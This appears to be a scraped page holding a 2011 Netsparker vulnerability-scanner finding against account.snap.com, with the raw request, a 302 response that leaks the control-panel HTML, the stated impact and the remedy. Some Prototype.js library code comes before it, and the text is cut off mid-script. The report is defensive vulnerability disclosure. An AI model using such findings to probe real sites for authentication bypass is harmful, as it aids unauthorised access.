pair.map(Object.inspect).join(': '); }).join(', ') + '}>'; }}function $H(object) { var hash = Object.extend({}, object || {}); Object.extend(hash, Enumerable); Object.extend(hash, Hash); return hash;}ObjectRange = Class.create();Object.extend(ObjectRange.prototype, Enumerable);Object.extend(ObjectRange.prototype, { initialize: function(start, end, exclusive) { this.start = start; this.end = end; this.exclusive = exclusive; }, _each: function(iterator) { var value = this.start; do { iterator(value); value = value.succ(); } while (this.include(value)); }, include: function(value) { if (value < this.start) return false; if (this.exclusive) return value < this.end; return value <= this.end; }});var $R = function(start, end, exclusive) { return new ObjectRange(start, end, exclusive);}var Ajax = { getTransport: function() { return Try.these( function() {return new ActiveXObject('Msxml2.XMLHTTP')}, function() {return new ActiveXObject('Microsoft.XMLHTTP')}, function() {return new XMLHttpRequest()} ) || false; }, activeRequestCount: 0}Ajax.Responders = { responders: [], _each: function(iterator) { this.responders._each(iterator); }, register: function(responderToAdd) { if (!this.include(responderToAdd)) this.responders.push(responderToAdd); }, unregister: function(responderToRemove) { this.responders = this.responders.without(responderToRemove); }, dispatch: function(callback, request, transport, json) { this.each(function(responder) { if (responder[callback] && typeof responder[callback] == 'function') { try { responder[callback].apply(responder, [request, transport, json]); } catch (e) {} } }); }};Object.extend(Ajax.Responders, Enumerable);Ajax.Responders.register({ onCreate: function() { Ajax.activeRequestCount++; }, onComplete: function() { Ajax.activeRequestCount--; }});Ajax.Base = function() {};Ajax.Base.prototype = { setOptions: function(options) { this.options = { method: 'post', asynchronous: true, parameters: '' } Object.extend(this.options, options || {}); }, responseIsSuccess: function() { return this.transport.status == undefined || this.transport.status == 0 || (this.transport.status >= 200 && this.transport.status < 300); }, responseIsFailure: function() { return !this.responseIsSuccess(); }}Ajax.Request = Class.create();Ajax.Request.Events = ['Uninitialized', 'Loading', 'Loaded', 'Interactive', 'Complete'];Ajax.Request.prototype = Object.extend(new Ajax.Base(), { initialize: function(url, options) { this.transport = Ajax.getTransport(); this.setOptions(options); this.request(url); }, request: function(url) { var parameters = this.options.parameters || ''; // XXX: commented out by Barry because he has no concept of how this could be relevant (03/02/2006) // if (parameters.length > 0) parameters += '&_='; try { this.url = url; if (this.options.method == 'get' && parameters.length > 0) this.url += (this.url.match(/\?/) ? '&' : '?') + parameters; Ajax.Responders.dispatch('onCreate', this, this.transport); this.transport.open(this.options.method, this.url, this.options.asynchronous); if (this.options.asynchronous) { this.transport.onreadystatechange = this.onStateChange.bind(this); setTimeout((function() {this.respondToReadyState(1)}).bind(this), 10); } this.setRequestHeaders(); var body = this.options.postBody ? this.options.postBody : parameters; this.transport.send(this.options.method == 'post' ? body : null); } catch (e) { this.dispatchException(e); } }, setRequestHeaders: function() { var requestHeaders = ['X-Requested-With', 'XMLHttpRequest', 'X-Prototype-Version', Prototype.Version]; if (this.options.method == 'post') { requestHeaders.push('Content-type', 'application/x-www-form-urlencoded'); /* Force "Connection: close" for Mozi..
Redirect Response BODY Is Too Large

Redirect Response BODY Is Too Large

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.

Impact

This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.
- /

/ CONFIRMED

https://account.snap.com/

Request

GET / HTTP/1.1
Referer: https://account.snap.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: account.snap.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Found
Date: Sat, 23 Jul 2011 21:07:51 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=0ecdf68911c776c6a84eb351224d5573; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login.php
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Your Snap Shots Control Panel</title><link rel="stylesheet" type="text/css" href="styles/account.css" /><script type="text/javascript" src="javascript/tab.js"></script><script type='text/javascript'>function toggle_section(num) { si = document.getElementById('section_'+num+'_img'); sd = document.getElementById('section_'+num+'_div'); sm = document.getElementById('section_'+num+'_more'); if (si.src.indexOf('/images/icon-more.gif') >= 0) { sd.style.display = 'inline'; sm.style.display = 'none'; si.src = '/images/icon-less.gif'; } else { sd.style.display = 'none'; sm.style.display = 'inline'; si.src = '/images/icon-more.gif'; }}function show_tab(tab) { var code = (tab == 'code') ? true : false; document.getElementById('editorial_text').style.display = code ? 'none' : ''; document.getElementById('code_text').style.display = code ? '' : 'none'; document.getElementById('editorial_tab').src = "/images/tab-editorial" + (code ? '' : '-on') + ".gif"; document.getElementById('code_tab').src = "/images/tab-code" + (code ? '-on' : '') + ".gif";}function resend_verification_email(email) { url = "/resend_verification_email.php?email="+escape(email); if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); xmlhttp.open("GET",url,false); xmlhttp.send(null); } else if (window.ActiveXObject) { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); if (xmlhttp){ xmlhttp.open("GET",url,false); xmlhttp.send(); } } else { var t_img = new Image(); t_img.src = url; } e = document.getElementById("resend_email"); e.innerHTML="A new verification email has been sent to . Please verify receipt by clicking the confirmation link in that email."; e.className="alert"; return false;}</script></head><body><div id="shell">
<div id="topbar">
<div id="logo">
<a href="/"><img src="/images/topbar-logo.gif" alt="Snap Shots" title="Snap Shots" /></a>
</div>
<div id="toplinks">
Not logged in | <a href="/login.php">Log In</a> | <a href="http://snap.com/snapshots_faq.php">Help</a> </div>
</div>
<div id="top-cap"></div><div id="wrapper"><!-- begin left side --> <div id="leftSide"> <h1>Your Snap Control Panel</h1> <div id="statusInfo"> <h3>Welcome, </h3> </div> <div class="message"> <h4>Get the Most Out of Snap Shots</h4> <p> Before you can access Snap Shares&trade;, you need to verify receipt of an email that has been sent to <b></b> by clicking the confirmation link in that email. </p> <p id="resend_email" class="info"> If you have not received that email you can request the email to be re-sent by clicking the following link: <a href="" onclick="return resend_verification_email('');">Re-send Verification Email</a> </p> <small>IMPORTANT: Please make sure to check your junk mail filter and update your settings to allow emails from the domain snap.com</small> </div> <div id="colCombine"> <h2>Manage Your Snap Shots Sites</h2> <div class="add-sites"> <img src="images/icon-add.gif" alt="+" border="0" width="9" height="9" /> <a href="/add_site.php">Add Snap Shots to another site</a> </div> <p><br /></p> <h2>Best Practices</h2> <p>The following are some simple steps that, in the experience of tens of thousands of site owners, have proved to work best when implementing Snap Shots on a web site or a blog.</p> <div> <img id="section_1_img" class="js-expand" src="/images/icon-more.gif" width="12" height="12" onclick="toggle_section(1);"> <b class="js-expand" onclick="toggle_section(1);">Explain the New Functionality</b><br /> <p class="inset"> When you install Snap Shots on your site, you should tell your readers about the new functionality. The announcement should include instruction for how your visitors can disable the functionality if they don't want it. <span id="section_1_more" style="display: inline"><a href="#" onclick="toggle_section(1);return false;">See Example</a></span> </p> <div id="section_1_div" style="display: none;"> <div class="example_text"> <div class="tabs"><img id="editorial_tab" src="/images/tab-editorial-on.gif" alt="Blog Text" onclick="show_tab('editorial');" /><img id="code_tab" src="/images/tab-code.gif" alt="Sample Code" onclick="show_tab('code');" /></div> <div class="example_body"> <div id="editorial_text" style="display:inherit;"> <h4>Introducing Snap Shots from Snap.com</h4> <p>I just installed a nice little tool on this site called Snap Shots that enhances links with visual previews of the <a href="http://www.snap.com" class="snap_noshots">destination site</a>, interactive excerpts of <a href="http://en.wikipedia.org/wiki/Picasso" class="snap_noshots">Wikipedia articles</a>, <a href="http://www.myspace.com/askaninja" class="snap_noshots">MySpace profiles</a>, <a href="http://imdb.com/name/nm0424060" class="snap_noshots">IMDb profiles</a> and <a href="http://www.amazon.com/Nokia-N95-Silver-Phone-Unlocked/dp/B000PEOLAG/" class="snap_noshots">Amazon products</a>, display inline <a href="http://youtube.com/watch?v=7rEM_dN24S0" class="snap_noshots">videos</a>, <a href="http://www.slashdot.org/" class="snap_noshots">RSS</a>, <a href="http://wiredset.com/media/colin_macintyre/How-Bout-I-Love-You-More.mp3" class="snap_noshots">MP3s</a>, <a href="http://i116.photobucket.com/albums/o34/perspexspaceship/" class="snap_noshots">photos</a>, <a href="http://finance.yahoo.com/q?s=aapl" class="snap_noshots">stock charts</a> and <a href="http://shots.snap.com" class="snap_noshots">more</a>.</p> <p>Sometimes Snap Shots bring you the information you need, without your having to leave the site, while other times it lets you "look ahead," before deciding if you want to follow a link or not.</p> <p>Should you decide this is not for you, just click the Options icon in the upper right corner of the Snap Shot and opt-out.</p> </div> <div id="code_text" style="display:none;"> <textarea style="width: 380px !important; height: 200px !important; font-size: 10px;"> <h4>Introducing Snap Shots from Snap.com</h4> I just installed a nice little tool on this site called Snap Shots that enhances links with visual previews of the <a href="http://www.snap.com" class="snap_shots">destination site</a>, interactive excerpts of <a href="http://en.wikipedia.org/wiki/Picasso" class="snap_shots">Wikipedia articles</a>, <a href="http://www.myspace.com/askaninja" class="Snap_Shot_Profile">MySpace profiles</a>, <a href="http://imdb.com/name/nm0424060" class="snap_shots">IMDb profiles</a> and <a href="http://www.amazon.com/Nokia-N95-Silver-Phone-Unlocked/dp/B000PEOLAG/" class="snap_shots">Amazon products</a>, display inline <a href="http://youtube.com/watch?v=7rEM_dN24S0" class="snap_shots">videos</a>, <a href="http://www.slashdot.org/" class="Snap_Shot_RSS">RSS</a>, <a href="http://wiredset.com/media/colin_macintyre/How-Bout-I-Love-You-More.mp3" class="snap_shots">MP3s</a>, <a href="http://i116.photobucket.com/albums/o34/perspexspaceship/" class="snap_shots">photos</a>, <a href="http://finance.yahoo.com/q?s=aapl" class="snap_shots">stock charts</a> and <a href="http://shots.snap.com" class="snap_shots">more</a>.<p>Sometimes Snap Shots bring you the information you need, without your having to leave the site, while other times it lets you "look ahead," before deciding if you want to follow a link or not.</p> <p>Should you decide this is not for you, just click the Options icon in the upper right corner of the Snap Shot and opt-out.</p> </textarea> </div> <hr /> <small>Please feel free to copy the text above, or write something along the same lines yourself.</small> </div> </div> </div> </div> <p></p> <div> <img id="section_2_img" class="js-expand" src="/images/icon-more.gif" width="12" height="12" onclick="toggle_section(2);"> <b class="js-expand" onclick="toggle_section(2);">Add a Snap Shots Badge</b><br /> <p class="inset"> By adding a Snap Shots Badge to your site, you let anyone visiting know that there is nothing ordinary about your site. <br /><a href="#" id="section_2_more" onclick="toggle_section(2);return false;">Show Snap Shots Badges</a> </p> <div id="section_2_div" style="display: none;"> <table id="badges"> <tr> <td class="col1"><img src="/images/shotsbadge1-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /><br />(GIF 120x30)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge1-120x30.gif"><img src="http://i.snap.com/images/shotsbadge1-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge2-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /><br />(GIF 120x30)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge2-120x30.gif"><img src="http://i.snap.com/images/shotsbadge2-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge3-120x30.gif" alt="Enhanced with Snapshots" width="120" height="30"><br />(GIF 120x30)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge3-120x30.gif"><img src="http://i.snap.com/images/shotsbadge3-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge4-120x30.gif" alt="Enhanced with Snapshots" width="120" height="30"><br />(GIF 120x30)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge4-120x30.gif"><img src="http://i.snap.com/images/shotsbadge4-120x30.gif" width="120" height="30" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge1-160x40.gif" alt="Enhanced with Snapshots" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge1-160x40.gif"><img src="http://i.snap.com/images/shotsbadge1-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge2-160x40.gif" alt="Enhanced with Snapshots" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge2-160x40.gif"><img src="http://i.snap.com/images/shotsbadge2-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge3-160x40.gif" alt="Enhanced with Snapshots" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge3-160x40.gif"><img src="http://i.snap.com/images/shotsbadge3-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> <tr> <td class="col1"><img src="/images/shotsbadge4-160x40.gif" alt="Enhanced with Snapshots [button]" width="160" height="40"><br />(GIF 160x40)</td> <td><textarea rows="4" name="badge-code"><a class="snap_shots" href="http://www.snap.com/snapshots.php?source=www.snap.com&campaign=shot_badge!!shotsbadge4-160x40.gif"><img src="http://i.snap.com/images/shotsbadge4-160x40.gif" width="160" height="40" alt="Enhanced with Snapshots" title="Enhanced with Snapshots" /></a></textarea></td> </tr> </table> </div> </div> </div><!-- end leftSide --> </div><div id="rightSide"><div class="sidebar"><h4>Recent Blog Posts</h4></div></div><div style="clear: both;"></div></div><div id="bottom-cap"></div><div id="footer">
<div id="logo">
<a href="http://snap.com/"><img src="/images/footer-logo.gif" alt="Snap" title="Snap" /></a>
</div>
<div id="footlinks">
<a href="http://snap.com/about/about.php">About</a> | <a href="http://blog.snap.com/">Blog</a> | <a href="http://snap.com/about/feedbk.php">Feedback</a> | <a href="http://snap.com/about/downloads.php">Download</a> | <a href="http://snap.com/about/privacy.php">Privacy</a> | <a href="http://snap.com/about/terms.php">Terms</a>
</div>
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_udn = document.domain;_uacct = "UA-2209883-1";if (typeof currentTab == "string") { urchinTracker("/index.php#" + currentTab);} else { urchinTracker();}</script></div><script type="text/javascript" src="/javascript/jquery.js"></script><img id="feedback_button" src="images/feedback.gif" alt="feedback" text="feedback" /><div class="lightbox"> <div class="lightbox-bg"> </div> <div class="lightbox-fg"> <form id="feedback" name="feedback"> <h3>Snap LinkAds Feedback</h3> Please type your question, suggestion or comment into the box below and click "Submit".<br/> <span id="feedback_error">Please enter your feedback and try again.<br/></span> <textarea name="feedback_text"></textarea> <input type="submit" name="submit" value="Submit" /> <input type="button" name="cancel" value="Cancel" /> </form> </div></div><script type="text/javascript">function show_feedback() { $('textarea[name=feedback_text]').html(''); $('.lightbox').css('display', 'block'); $("#feedback_error").css('display', 'none');}function hide_feedback() { $('.lightbox').css('display', 'none');}function submit_feedback(ev) { var feedbac..